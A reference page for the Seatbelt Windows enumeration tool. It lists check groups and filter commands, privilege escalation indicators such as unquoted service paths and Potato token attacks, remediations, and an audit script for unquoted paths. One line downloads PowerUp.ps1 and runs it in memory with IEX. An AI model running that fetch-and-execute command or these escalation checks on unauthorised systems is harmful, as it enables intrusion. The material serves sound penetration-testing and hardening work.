Seatbelt

Seatbelt is a C# Windows enumeration tool providing detailed system security assessments, vulnerability discovery, and privilege escalation path identification.

Installation

# Download compiled binary
https://github.com/GhostPack/Seatbelt/releases

# Compile from source (requires Visual Studio)
git clone https://github.com/GhostPack/Seatbelt.git
cd Seatbelt
# Open Seatbelt.sln in Visual Studio and build

Basic Usage

Command                         Description
Seatbelt.exe -h                 Display help and groups
Seatbelt.exe -group=all         Run all checks
Seatbelt.exe -group=system      System information
Seatbelt.exe -group=user        User and group info
Seatbelt.exe -group=network     Network enumeration
Seatbelt.exe -group=dotnet      .NET information
Seatbelt.exe -group=misc        Miscellaneous checks

Enumeration Groups

System Group

Seatbelt.exe -group=system
  • OS version and build
  • System boot time
  • Hotfixes and patches
  • Running processes (elevation context)
  • Processor and memory info

User Group

Seatbelt.exe -group=user
  • Current user and privileges
  • User groups and memberships
  • Clipboard content
  • Desktop files and shortcuts
  • User environment variables
  • Scheduled tasks by user

Network Group

Seatbelt.exe -group=network
  • Network adapters and configuration
  • ARP table
  • Routing table
  • Active network connections
  • DNS configuration
  • Firewall rules

Process Group

Seatbelt.exe -group=process
  • All running processes
  • Process privileges
  • Process integrity level
  • DLL and module loads
  • Window titles (may contain sensitive data)

Services Group

Seatbelt.exe -group=services
  • All services and status
  • Service binary paths (unquoted path detection)
  • Service DACL permissions
  • Service startup type
  • Service logon users

Software Group

Seatbelt.exe -group=software
  • Installed applications
  • Software versions
  • Install paths
  • Known vulnerable software detection

Misc Group

Seatbelt.exe -group=misc
  • Event log information
  • Available credentials
  • WMI Event Subscriptions
  • Windows Defender status
  • Antivirus products
  • RDP sessions
  • Recycle bin contents
  • Browser history and credentials

Detailed Command Examples

Check UAC Configuration

Seatbelt.exe -group=system | findstr /i "UAC"

Find Unquoted Service Paths

Seatbelt.exe -group=services | findstr /i "unquoted"

List Privilege-Escalation Vectors

# findstr has no "\|" alternation; space-separated strings are matched as OR
Seatbelt.exe -group=all | findstr /i "privesc unquoted admin system"

Check for Vulnerable Software

Seatbelt.exe -group=software
# Cross-reference versions with known CVEs

Network Reconnaissance

Seatbelt.exe -group=network
# Identify exposed services and listening ports

Check Credentials

Seatbelt.exe -group=misc | findstr /i "credential password"

Key Privilege Escalation Indicators

Critical Findings

  1. Unquoted Service Paths
     Service: VulnerableService
     Binary: C:\Program Files\Vulnerable Program\service.exe
     Problem: Exploitable via DLL hijacking at C:\Program.exe
  2. Weak Service Permissions
     Service DACL allows Everyone/Authenticated Users to:
     - Stop/Start service
     - Change service binary path
     - Change service logon user
  3. UAC Bypass Opportunities
     • UAC level set to “Never notify”
     • AutoElevation enabled on vulnerable apps
     • COM object elevation opportunities
  4. Kernel Vulnerabilities
     • Missing patches enabling local privilege escalation
     • Vulnerable drivers installed
  5. Token Impersonation
     • SeImpersonatePrivilege enabled
     • Potato attacks available (Rotten/Golden/Sweet Potato)

Important Findings

  • Services running with weak permissions
  • Interesting scheduled tasks
  • Browser saved credentials
  • Configuration files with passwords
  • Writable system directories
  • Weak registry permissions

Output Parsing Tips

# Save output to file for analysis
Seatbelt.exe -group=all > seatbelt_output.txt

# Search for specific keywords
findstr /i "admin system privesc unquoted" seatbelt_output.txt

# Count findings
findstr /r "^\*" seatbelt_output.txt | find /c "*"

Combining with Other Tools

# Run Seatbelt then PowerUp for redundancy
Seatbelt.exe -group=all
powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks"

# Use with winPEAS for comprehensive enumeration
winPEASx64.exe all

Remediation Actions

Based on Seatbelt findings:

  1. Unquoted Service Paths - Add quotes to service binary paths
  2. Service Permissions - Restrict service DACLs to minimal required users
  3. Scheduled Tasks - Audit and remove unnecessary tasks
  4. UAC - Set to appropriate security level
  5. Hotfixes - Apply all security patches and updates
  6. Credentials - Audit and remove stored credentials
  7. Antivirus - Ensure Windows Defender or equivalent is enabled
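
An added example (not Seatbelt's code and not from the original page) that audits the unquoted service path finding and produces the quoted value the remediation list calls for. The function name `Test-UnquotedServicePath` and the sample service entries are constructed for illustration; the first entry reuses the path shown under Critical Findings.

```powershell
# Added example: flag unquoted service paths containing spaces, list the paths
# Windows would try before the real binary, and build the quoted replacement.
function Test-UnquotedServicePath {
    param(
        [Parameter(Mandatory)][string]$Name,
        [string]$PathName = ''
    )
    $path = $PathName.Trim()
    # Empty or already-quoted paths are parsed unambiguously.
    if (-not $path -or $path.StartsWith('"')) { return }

    # Split the executable from any arguments that follow ".exe".
    $m = [regex]::Match($path, '^(?<exe>.+?\.exe)(?<args>\s.*)?$', 'IgnoreCase')
    if (-not $m.Success) { return }
    $exe = $m.Groups['exe'].Value
    if ($exe -notmatch ' ') { return }      # no space, nothing ambiguous

    # Each space-delimited prefix is tried as "<prefix>.exe" first.
    $parts = $exe -split ' '
    $tried = @(for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    })

    [pscustomobject]@{
        Service     = $Name
        TriedFirst  = $tried
        # Directories that must not be writable by non-administrators.
        CheckAclOn  = $tried | ForEach-Object { Split-Path -Path $_ -Parent } |
                      Select-Object -Unique
        # Value to review and then write to the service's ImagePath, e.g.
        # Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\<Name>" ImagePath <value>
        QuotedValue = '"{0}"{1}' -f $exe, $m.Groups['args'].Value
    }
}

# Constructed sample data. On a live host, use instead:
#   $services = Get-CimInstance Win32_Service | Select-Object Name, PathName
$services = @(
    [pscustomobject]@{ Name = 'VulnerableService'; PathName = 'C:\Program Files\Vulnerable Program\service.exe' }
    [pscustomobject]@{ Name = 'QuotedService';     PathName = '"C:\Program Files\Good App\svc.exe" -run' }
    [pscustomobject]@{ Name = 'NoSpaces';          PathName = 'C:\Windows\System32\svchost.exe -k netsvcs' }
)

$services |
    ForEach-Object { Test-UnquotedServicePath -Name $_.Name -PathName $_.PathName } |
    Format-List
```

Only `VulnerableService` is reported, with `C:\Program.exe` and `C:\Program Files\Vulnerable.exe` listed as the paths tried first.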

Advanced Scenarios

Detecting Privilege Escalation Vectors

# Services running as SYSTEM with weak permissions
Seatbelt.exe -group=services | Select-String "SYSTEM" | Select-String "Everyone|Authenticated Users"

# Unquoted paths in user-writable directories
Seatbelt.exe -group=services | Select-String "unquoted" | Select-String "Program Files|Temp"

Identifying Lateral Movement Opportunities

Seatbelt.exe -group=network
# Find accessible network shares, RDP sessions, etc.

Persistence Mechanisms

Seatbelt.exe -group=user
# Review scheduled tasks and Run registry entries

Related Tools

  • winPEAS: General Windows privilege escalation enumeration
  • PowerUp: PowerShell-based privilege escalation checks
  • SharpUp: C# port of PowerUp
  • PrivEsc: Another C# enumeration tool
  • GodPotato/JuicyPotato: Token impersonation exploits

Last updated: March 2025